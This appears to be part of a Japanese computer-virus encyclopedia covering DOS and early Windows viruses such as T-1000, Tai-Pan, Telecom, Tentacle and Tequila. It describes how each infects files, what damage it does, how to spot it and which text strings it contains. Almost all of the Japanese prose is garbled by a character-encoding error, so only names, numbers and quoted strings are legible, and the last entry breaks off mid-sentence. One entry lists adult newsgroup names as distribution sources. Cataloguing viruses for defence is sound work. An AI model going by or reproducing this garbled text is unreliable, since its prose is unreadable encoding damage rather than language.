T-1000


̾¡¡¡¡¾Î:T-1000

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:128¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¤Þ¤º¥¦¥¤¥ë¥¹¥³¡¼¥É¤Î¸å¤íȾʬ¤ò°Å¹æ²òÆÉ¤·¡¢¥«¥ì¥ó¥È¥Ç ¥£¥ì¥¯¥È¥ê¤Î Á´¤Æ¤Î.COM¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£ ¼¡¤Ë¥·¥¹¥Æ¥à¤ÎÆüÉÕ¤ò°Å¹æ²½¤·¥ª¥ê¥¸¥Ê¥ë¥×¥í¥°¥é¥àÆâ¤Ë Êݸ¤¹¤ë¡£ ¥ª¥ê¥¸¥Ê¥ë¥×¥í¥°¥é¥à¤ÎÀèÆ¬Éô128¥Ð¥¤¥È¤ò¥¦¥¤¥ë¥¹¥³¡¼¥É ¤Ç½ñ¤­´¹¤¨¤ë¤Î¤Ç¡¢ ¥ª¥ê¥¸¥Ê¥ë¥×¥í¥°¥é¥à¤Î¥µ¥¤¥º¤¬128¥Ð¥¤¥È°Ê²¼¤Ç¤¢¤ì¤Ð´¶ À÷¸å¤Ï128¥Ð¥¤¥È¤Ë¤Ê¤ë¡£ ¥µ¥¤¥º¤¬128¥Ð¥¤¥È°Ê¾å¤Î¾ì¹ç¡¢¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤ÏÊѹ¹¤µ¤ì ¤Ê¤¤¡£
Ç˲õ:
¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤ÎÀèÆ¬127¥Ð¥¤¥È¤ò¾å½ñ¤­¤¹¤ë¤¿¤á¡¢¥Õ ¥¡¥¤¥ë¤¬Ç˲õ¤µ¤ì¤ë¡£
¼±ÊÌÊýË¡:´¶À÷¥Õ¥¡¥¤¥ë¤ÎÆüÉդȻþ¹ï¤ÏÊѹ¹¤µ¤ì¤ë¡£

È÷¡¡¡¡¹Í:

T-1000-B


̾¡¡¡¡¾Î:T-1000-B

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î̤´¶À÷.COM¥Õ¥¡¥¤¥ë¤òõ¤·½Ð¤· ¤Æ1¤Ä¤º¤Ä´¶À÷¤¹¤ë¡£
Ç˲õ:
¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤ò¥¦¥¤¥ë¥¹¥³¡¼¥É¤Ç¾å½ñ¤­¤¹¤ë¤¿¤á¡¢ ¥Õ¥¡¥¤¥ë¤¬Ç˲õ¤µ¤ì¤ë¡£
È÷¡¡¡¡¹Í:¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß¶Ø
»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TAI-PAN.438.A


̾¡¡¡¡¾Î:TAI-PAN.438.A

ÊÌ¡¡¡¡Ì¾:WHISPERޤ TAI-PAN

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:438¥Ð¥¤¥È

ȯ¾ÍÃÏ:¥¹¥¦¥§¡¼¥Ç¥ó

ȯ¸«Æü:1994/07

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡Ý´¶À÷¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¥¦¥¤¥ë¥¹¤Ï¥á¥â¥ê¤Ë¾ï Ã󤹤롣 ¡Ý°Ê¹ß¡¢¼Â¹Ô¤µ¤ì¤¿¤¹¤Ù¤Æ¤Î.EXE¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£¤¿ ¤À¤·¡¢£¶£´£Ë¥Ð¥¤¥È°Ê¾å¤Î¥Õ¥¡¥¤¥ë¤Ë¤Ï´¶À÷¤·¤Ê¤¤¡£
ȯÉÂ:
¡ÝÆÃ¤ËÇ˲õ³èư¤Ê¤É¤Ï¹Ô¤ï¤Ê¤¤¤â¤Î¤È»×¤ï¤ì¤ë¡£
¤½¤Î¾:
¡Ý¥¦¥¤¥ë¥¹¥³¡¼¥ÉÃæ¤Ë²¼µ­¤Îʸ»úÎ󤬸«¤é¤ì¤ë¡£ ¡¡"[Whisper presenterar Tai-Pan]"
È÷¡¡¡¡¹Í:¥Ñ¥¿¡¼¥ó£±£±£°°ÊÁ°¤ò»ÈÍѤ·¤¿¾ì¹ç¡¢¡Ö
Whisper¡×¤È¤¤¤¦Ì¾¾Î¤Çȯ¸«¤µ¤ì¤ë¡£

TAIPAN.438C


̾¡¡¡¡¾Î:TAIPAN.438C

ÊÌ¡¡¡¡Ì¾:WHISPER

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE(NE·Á¼°¤ÎWindowsÍÑ16bit¼Â¹Ô¥Õ¥¡¥¤¥ë)

¥¦¥¤¥ë¥¹¥µ¥¤¥º:438bytes

ȯ¾ÍÃÏ:Norwayޤ USAޤ UKޤ Hungaryޤ Icelandޤ Franceޤ

Peruޤ Indiaޤ SwedenŽ¤È¯¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
-¡¡´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ¥á¥â¥ê¤Ë¾ïÃó¤·Ž¤°Ê¸åޤ¼Â¹Ô ¤µ¤ì¤¿.EXE¥Õ¥¡¥¤¥ë¤Ë¤¹¤Ù¤Æ´¶À÷¤¹¤ëŽ¡ -¡¡´¶À÷¤·¤¿¥Õ¥¡¥¤¥ë¤Ï¥µ¥¤¥º¤¬438¥Ð¥¤¥ÈÁý²Ã¤¹¤ëŽ¡
»³²:
-¡¡¥³¡¼¥É¤ò¥³¥Ô¡¼¤¹¤ë°Ê³°¤ËÇ˲õ³èư¤Ê¤·Ž¡
È÷¡¡¡¡¹Í:-¡¡¥¦¥¤¥ë¥¹¥³¡¼¥ÉÆâ¤Ë²¼µ­¤Îʸ»úÎ󤬤¢¤ëŽ¡
Whisper presenterar Tai-Pan

TAIWAN


̾¡¡¡¡¾Î:TAIWAN

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1300-1503¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
1¡Ë¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¾ïÃ󤹤롣 2¡Ë¾ïÃó¸å¡¢¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¡£ 3¡Ë¥á¥â¥ê¤Ë¾ïÃó¤·¡¢Ì¤´¶À÷¤Î¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ëÅ٤˴¶ À÷¤¹¤ë¡£
Ç˲õ:
ËÜ¥¦¥¤¥ë¥¹¤Ë¤Ï¤¤¤¯¤Ä¤«ÊѼ郎¤¢¤ê¡¢Ãæ¤Ë¤ÏÇ˲õ³èư¤òȼ ¤ï¤Ê¤¤¤â¤Î¤â¤¢¤ì¤Ð ½èÍý®ÅÙ¤òÃÙ¤¯¤¹¤ë¤â¤Î¤â¤¢¤ë¡£Íð¿ô¥«¥¦¥ó¥¿¤ò»ý¤ÄÊÑ¼ï ¤â¤¢¤ë¡£ ¥«¥¦¥ó¥¿¤¬¥¼¥í¤Ë¤Ê¤ë¤È¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ÎºÇ½é¤ÎÉôʬ¤ò ¾å½ñ¤­¤¹¤ë¤¿¤á¥Ç¡¼¥¿¤Î°ìÉô¤¬¼º¤ï¤ì¤ë¡£
¼±ÊÌÊýË¡:
´¶À÷¥Õ¥¡¥¤¥ë¤Ï1300-1503¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£ ¥¦¥¤¥ë¥¹¤¬¥á¥â¥ê¤Ë¾ïÃ󤹤ë¤È¡¢ÅÙ¡¹¥·¥¹¥Æ¥à¤¬¥Ï¥ó¥°¤¹ ¤ë¡£ ¥¦¥¤¥ë¥¹¥³¡¼¥É¤ÎÃæ¤Ë¤Ï¡¢ "Mummy Version x.xxx"ޤ"Kaohsiung Senior School"¡¢ "Tzeng Jau Ming presents"¡¢"Series Number=[xxxxx]. " ¤È¤¤¤¦Ê¸»úÎ󤬰Ź沽¤µ¤ì¤Æ´Þ¤Þ¤ì¤Æ¤¤¤ë¡£
È÷¡¡¡¡¹Í:¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß¶Ø
»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TANKARD


̾¡¡¡¡¾Î:TANKARD

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:493¥Ð¥¤¥Èȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¡¢¾å°Ì¥á¥â¥ê¤Ë¾ïÃ󤹤롣 ¾ïÃó¸å¡¢¥ª¥ê¥¸¥Ê¥ë¥ë¡¼¥Á¥ó¤ËÌá¤ë¡£ ̤´¶À÷¤Î.COM¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ëÅ٤˴¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21h¡¢INT 24h

Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

¼±ÊÌÊýË¡:´¶À÷¥Õ¥¡¥¤¥ë¤Ï493¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£

È÷¡¡¡¡¹Í:

TELECOM


̾¡¡¡¡¾Î:TELECOM

ÊÌ¡¡¡¡Ì¾:TELEFONICAޤ TELECOM FILEޤ SPANISH TELECOM

ʬ¡¡¡¡Îà:Ê£¹ç´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:3ޤ700¥Ð¥¤¥È

ȯ¾ÍÃÏ:޽ŽÍŽß޲ŽÝ

ȯ¸«Æü:1991/06

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
£±¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¥á¥â¥ê¤Ë¾ïÃ󤹤롣 ¾ïÃó¸å¡¢DOS¤ÎCHKDSK¤ò»ÈÍѤ¹¤ë¤È¶õ¤­¥á¥â¥ê¤¬3ޤ984¥Ð ¥¤¥È¸º¾¯¤·¤Æ¤¤¤ë¤Î¤¬³Îǧ¤Ç¤­¤ë¡£ £²¡Ë¾ïÃó¸å¡¤1ޤ000¥Ð¥¤¥È°Ê¾å¤Î.COM¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë Å٤˴¶À÷¤¹¤ë¡£ ¥Õ¥¡¥¤¥ë¡¦¥µ¥¤¥º¤¬Ìó1Kbyte°Ê¾å¤Ç¤Ê¤±¤ì¤Ð´¶À÷¤·¤Ê ¤¤¡£ ¥¦¥£¥ë¥¹¤¬¾ïÃ󤷤Ƥ¤¤ë¤ÈDIR¥³¥Þ¥ó¥É¤ò»È¤Ã¤Æ¤â¡¢¥Õ¥¡ ¥¤¥ë¥µ¥¤¥º¤ÎÁý²Ã¤ò¼¨¤µ¤Ê¤¤¡£ £³¡Ë¾ïÃó¸å¡¢¥æ¡¼¥¶¤¬¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Õ¥¡¥¤¥ë¤ä¥×¥í¥° ¥é¥à¤Ë¥¢¥¯¥»¥¹¤¹¤ë¤È¡¢ Anti-Tel¥¦¥£¥ë¥¹¤ÎÊѼ郎¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ñ¡¼¥Æ¥£¥· ¥ç¥ó¡¦¥Æ¡¼¥Ö¥ë¤Ë´¶À÷¤¹¤ë¡£ ¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¡¦¥Æ¡¼¥Ö¥ë¤Ø¤Î´¶À÷¤Ë¤Ä¤¤¤Æ¤Ï¡¢Anti- Tel¥¦¥£¥ë¥¹¤ò»² ¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¥Æ¡¼¥Ö¥ë¤Ë´¶À÷¤¹¤ë¾ì¹ç¡¢Telecom¥¦¥£¥ë ¥¹¤Ï¤½¤Ã¤¯¤ê¼«Ê¬¤ò ¥³¥Ô¡¼¤·¤Ê¤¤¤¿¤á¡¢Ã±ÆÈ¤Ç¤Ï¥Õ¥¡¥¤¥ë´¶À÷¤Ç¤­¤Ê¤¤¡£ _
´¶À÷¾ÜºÙ:
´¶À÷¥Õ¥¡¥¤¥ë¤Ï¥¿¥¤¥à¥¹¥¿¥ó¥×¤ÎÆüÉÕ¤Îǯ¤Ë100¤¬²Ã»»¤µ ¤ì¤ë¤¬¡¢ ¾ïÃó¸å¤ÏDIR¥³¥Þ¥ó¥É¤Ç¤Ïɽ¼¨¤µ¤ì¤Ê¤¤¡£ ÆüÉÕÊѹ¹¤Ï¥¦¥£¥ë¥¹¤¬´¶À÷ºÑ¤ß¥Õ¥¡¥¤¥ë¤òȽÊ̤¹¤ëÌܰõ ¤Ç¤¢¤ë¡£ ¡ÝTelecom¤Îºî¼Ô¤ÏAnti-Tel¡¢Holocaust¤Îºî¼Ô¤ÈƱ°ì¿Íʪ ¤Ç¤¢¤ë¡£ ¤³¤Î»°¤Ä¤Î¥¦¥£¥ë¥¹¤Ï°Å¹æ²½¥¦¥£¥ë¥¹¤Ç¤¢¤ë¡£ ¡Ý¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¡¦¥Æ¡¼¥Ö¥ë¤Ë´¶À÷¤¹¤ë Anti-Tel¥¦¥£¥ë¥¹¤ÎÊѼï¤ò ÆâÉô¤Ë´Þ¤à¡£ ¡ÝTelecom¤Î¥Õ¥¡¥¤¥ë´¶À÷Éôʬ¤ÏȯÉ¥ᥫ¥Ë¥º¥à¤ò»ý¤¿¤Ê ¤¤¡£È¯É¥ᥫ¥Ë¥º¥à¤Ï¥Ñ¡¼ ¥Æ¥£¥·¥ç¥ó¡¦¥Æ¡¼¥Ö¥ë¤Ë¤¢¤ë¡£´¶À÷¥Ç¥£¥¹¥¯¤«¤é£´£°£° ²óµ¯Æ°¤·¤¿¤Î¤Á¡¢¥¦¥£¥ë¥¹¤Ï ¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ò¾å½ñ¤­¤¹¤ë¡£
È÷¡¡¡¡¹Í:¡ÝAnti-Tel¡¢ Holocaust»²¾È¡£

TEMPEST


̾¡¡¡¡¾Î:TEMPEST

ÊÌ¡¡¡¡Ì¾:BURMAޤ SWIZZLESTYXX

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM;.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:563

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:1994/7

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î¥Õ¥¡¥¤¥ë
¤Ë´¶À÷¸å¡¢¥×¥í¥ó¥×¥È¤ËÌá¤ë¡£
Ç˲õ:¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤ò¥¦¥¤¥ë¥¹¥³¡¼¥É¤Ç¾å½ñ¤­¤¹¤ë
¤Î¤Ç¡¢¥Õ¥¡¥¤¥ë¤¬Ç˲õ¤µ¤ì¤ë¡£ ¡Ý¡¡¥¦¥¤¥ë¥¹¤Ë´¶À÷¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È°Ê²¼¤Î
¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë:
¡¡"Reading system configurationޤ please wait."
¡Ý¡¡¥¦¥¤¥ë¥¹¥³¡¼¥ÉÆâ¤Ë°Ê²¼¤Îʸ»úÎó¤ò´Þ¤à:
¡¡"*.?o? *.?x? \DOS \"¡¡¡¢¡¡"SwizzleStyxx!" ¡¢ "Dark Avenger"
È÷¡¡¡¡¹Í:

TENTACLE


̾¡¡¡¡¾Î:TENTACLE

ÊÌ¡¡¡¡Ì¾:WIN.TENTACLE

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1950¡Á1960¥Ð¥¤¥È

ȯ¾ÍÃÏ:¥Õ¥é¥ó¥¹or¥¤¥®¥ê¥¹

ȯ¸«Æü:1996

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡Ý´¶À÷¥Õ¥¡¥¤¥ë¤¬¥¢¥¯¥»¥¹¤µ¤ì¤¿»þ¤Ë¡¢¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯ ¥È¥ê¤ÈWindows¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î̤´¶À÷¥Õ¥¡¥¤¥ë¤òõ¤·¤Æ´¶ À÷¤¹¤ë¡£
ȯÉÂ:
¡Ý´¶À÷¥Õ¥¡¥¤¥ë¤Î¥¢¥¤¥³¥ó¤ò¥¦¥¤¥ë¥¹¤Î¤â¤Î¡Ê¥¿¥³¤Î³¨¡Ë ¤ËÊѤ¨¤Æ¤·¤Þ¤¦¡£ ¡Ý¥Õ¥¡¥¤¥ëÀèÆ¬¤Ë´¶À÷¤¹¤ë¤¬´¶À÷»þ¤Ë¸µ¤Î¥Õ¥¡¥¤¥ë¤òÇ˲õ ¤·¤Æ¤·¤Þ¤¦¤³¤È¤¬Â¿¤¤¡£ ¡Ý¥¦¥¤¥ë¥¹¼«¿È¤Ë¤è¤ëÇ˲õ³èư¤Ê¤É¤Ï¹Ô¤ï¤Ê¤¤¤â¤Î¤È»×¤ï ¤ì¤ë¡£ ¤½¤Î¾ ¡Ý¥¤¥ó¥¿¡¼¥Í¥Ã¥È¥Ë¥å¡¼¥¹¥°¥ë¡¼¥×¡Öalt.cracks¡×¤ÇÇÛÉÛ ¤µ¤ì¤¿"dogzcode.zip"¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬´¶À÷¸»¤Î°ì¤Ä¤È¸« ¤é¤ì¤ë¡£
È÷¡¡¡¡¹Í:

TENTACLE.10634


̾¡¡¡¡¾Î:TENTACLE.10634

ÊÌ¡¡¡¡Ì¾:SHELL.10634ޤ TENTACLE II

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE;.SCR

¥¦¥¤¥ë¥¹¥µ¥¤¥º:10634¥Ð¥¤¥È

ȯ¾ÍÃÏ:¥ª¡¼¥¹¥È¥é¥ê¥¢¡©

ȯ¸«Æü:1996/06

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡¡´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤¿»þ¤Ë°Ê²¼¤Î¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î ̤´¶À÷¥Õ¥¡¥¤¥ë¤ò£´¤Äõ¤·¤Æ´¶À÷¤¹¤ë¡£ ¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥ê
c:\windows

c:\win

c:\win31

c:\win311

c:\win95
¡¡¤Û¤È¤ó¤É¤Î¾ì¹ç´¶À÷»þ¤Ë¸µ¤Î¥Õ¥¡¥¤¥ë¤òÇ˲õ¤·¤Æ¤·¤Þ ¤¦¡£ ¡¡£³£²¥Ó¥Ã¥È´Ä¶­¡ÊWindows95ޤWindowsNT¡Ë¤Î¼Â¹Ô¥Õ¥¡¥¤¥ë ¤Ë¤â´¶À÷¤¹¤ë¤¬Àµ¾ï¤Ë´¶À÷¤¹¤ë¤³¤È¤¬¤Ç¤­¤Ê¤¤¡£ ¡¡´¶À÷¤·¤Æ¤â¥Õ¥¡¥¤¥ëÆü»þ¤Ï¹¹¿·¤µ¤ì¤Ê¤¤¡£¡¡
Ç˲õ:

¡¡²¿¤é¤«¤Î¥¿¥¤¥ß¥ó¥°¤Ç´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤Èc:¥É
¥é¥¤¥Ö¤Î¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤ËTENTACLE ¤È¤¤¤¦¥Õ¥¡¥¤¥ë̾ ¤Ç¥ê¡¼¥É¥ª¥ó¥ê¡¼¤Î¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£
È÷¡¡¡¡¹Í:¡Ý¡¡°Ê²¼¤Î¥¤¥ó¥¿¡¼¥Í¥Ã¥È¥Ë¥å¡¼¥¹¥°¥ë¡¼¥×¤Ë
Åê¹Æ¤µ¤ì¤Æ¤¤¤¿¥¹¥¯¥ê¡¼¥ó¥»¡¼¥Ð¡¼¥×¥í¥°¥é¥à¡Ê¥Õ¥¡¥¤¥ë
̾:PCTRSHOW.ZIP¡Ë¤¬´¶À÷¸»¤Î°ì¤Ä¤È¤ß¤é¤ì¤ë¡£
¡¡¡¡ alt.sex.pictures alt.binaries.pictures.erotica alt.binaries.pictures.erotica.blondes alt.binaries.pictures.erotica.breasts alt.binaries.pictures.erotica.cheerleaders alt.binaries.pictures.erotica.female alt.binaries.pictures.erotica.lesbians alt.binaries.pictures.erotica.oral alt.binaries.pictures.erotica.orientals alt.binaries.pictures.erotica.redheads alt.binaries.pictures.erotica.teen alt.binaries.pictures.erotica.teen.female alt.binaries.pictures.erotica.voyeursims alt.binaries.pictures.groupsex alt.binaries.pictures.erotica.latina alt.binaries.pictures.celebrities alt.binaries.pictures.girls

TENTACLE.10634.A


̾¡¡¡¡¾Î:TENTACLE.10634.A

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:10ޤ634¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡¡´¶À÷¥Õ¥¡¥¤¥ë¤¬³«¤«¤ì¤ë¤È¡¢.EXE¥Õ¥¡¥¤¥ë¤ËľÀÜ´¶À÷¤¹ ¤ë¡£ ¡¡
»³²:
¡¡´¶À÷¥Õ¥¡¥¤¥ë¤¬10ޤ634¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£
È÷¡¡¡¡¹Í:

TEQUILA


̾¡¡¡¡¾Î:TEQUILA

ÊÌ¡¡¡¡Ì¾:STEALTH

ʬ¡¡¡¡Îà:Ê£¹ç´¶À÷·¿

ÂС¡¡¡¾Ý:FD:¥Ö¡¼¥È¥»¥¯¥¿;HD:¥Þ¥¹¥¿¡¼¥Ö¡¼¥È¥ì¥³¡¼¥É;.
EXE
¥¦¥¤¥ë¥¹¥µ¥¤¥º:2ޤ468¥Ð¥¤¥È

ȯ¾ÍÃÏ:޽޲޽

ȯ¸«Æü:1991/04

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡Ý¤³¤Î¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Ç¥Þ¥·¥ó¤Î µ¯Æ°Æ°ºî¤ò¹Ô¤¦¤È¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥·¥¹¥Æ¥àÎΰè¡Ê¥Þ¥¹¥¿ ¡¼¥Ö¡¼¥È¥ì¥³¡¼¥É¡Ë¤Ë´¶À÷¤¹¤ë¡£¤Þ¤¿´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô ¤·¤Æ ¤â¡¢Æ±Íͤ˥ϡ¼¥É¥Ç¥£¥¹¥¯¤Î¥·¥¹¥Æ¥àÎΰè¤Ë´¶À÷¤¹¤ëŽ¡ ¡Ý¤³¤Î¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Ç¥Þ¥·¥ó¤òµ¯Æ° ¤¹¤ë¤È¡¢¥á¥â¥ê¡¼¤Ë¾ïÃ󤷤ƥե¡¥¤¥ë¤ÎÆþ½ÐÎϤò´Æ»ë¤¹ ¤ë¡£¤½¤Î¸å¡¢½ñ¤­¹þ¤ß²Äǽ¤Ê¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Ë¥¢¥¯¥» ¥¹¤¹¤ë ¤È¡¢¤½¤Î¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿¤Ë´¶À÷¤¹¤ë¡£¤Þ¤¿¼Â¹Ô¤· ¤¿.EXE¥Õ¥¡¥¤¥ë¤ÎºÇ¸å¤Ë¥¦¥¤¥ë¥¹¥³¡¼¥É¤òÄɲ䷤ƴ¶À÷¤¹ ¤ëŽ¡ ¡Ý¥Õ¥¡¥¤¥ë̾¤¬"V"¤â¤·¤¯¤Ï"SC"¤Ç»Ï¤Þ¤ë¤â¤Î¤Ë¤Ï´¶À÷¤·¤Ê ¤¤¡£
ȯÉÂ:
¡ÝºÇ½é¤Ë´¶À÷¤·¤Æ¤«¤é¿ô¥ö·î·Ð¤Ä¤Èȯɤ¹¤ë¡£ ¡ÝºÇ½é¤Ë´¶À÷¤·¤¿Æü¡Ê1¡Á31¤Þ¤Ç¤Î¿ô»ú¡¢Ç¯¤ä·î¤Î¥Ç¡¼¥¿¤Ï ½ü¤¯¡Ë¤¬µ­Ï¿¤µ¤ì¤ë¡£ ¡Ý°Ê¹ß¡¢Ëè·î¡¢ºÇ½é¤Ë´¶À÷¤·¤¿Æü¤Ë´¶À÷¥×¥í¥°¥é¥à¤¬¼Â¹Ô ¤µ¤ì¤ë¤È¡¢¥°¥é¥Õ¥£¥Ã¥¯¤È°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì ¤ë¡£ ¡¡Welcome to T.TEQUILA'S latest production. ¡¡Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/ Switzerland ¡¡Loving thoughts to L.I.N.D.A ¡¡BEER and TEQUILA forever !
¡¡"$Execute: mov axޤ FE03 / int 21. Key to go on!"

¤½¤Î¾:
¡ÝµÕ¥¢¥»¥ó¥Ö¥ë¤äñ½ã¤Ê¥¦¥¤¥ë¥¹¸¡º÷¥×¥í¥°¥é¥àÍѸ¡º÷ʸ »úÎó¤Çȯ¸«¤Ç¤­¤Ê¤¤¤è¤¦¤ËÊ£»¨¤Ê°Å¹æ²½¥á¥«¥Ë¥º¥à¤ò»ÈÍÑ ¤·¤Æ¤¤¤ë¡£ ¡Ý¥á¥â¥ê¾ïÃóÃæ¤Ë¡¢DOS¤ÎCHKSDK¥³¥Þ¥ó¥É¤ò»ÈÍѤ¹¤ë¤È¥Õ¥¡ ¥¤¥ë¥¢¥í¥±¡¼¥·¥ç¥ó¥¨¥é¡¼¤ò½ÐÎϤ·¡¢/F¥ª¥×¥·¥ç¥ó¤òÉÕ¤± ¤ÆCHKDSK¤ò¼Â¹Ô¤¹¤ë¤È¥Õ¥¡¥¤¥ë¤¬Ç˲õ¤µ¤ì ¤ë¾ì¹ç¤¬¤¢¤ë¡£ ¡Ý´¶À÷¤·¤¿.EXE¥Õ¥¡¥¤¥ë¤Ï2ޤ468¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¤¬¡¢dir¥³ 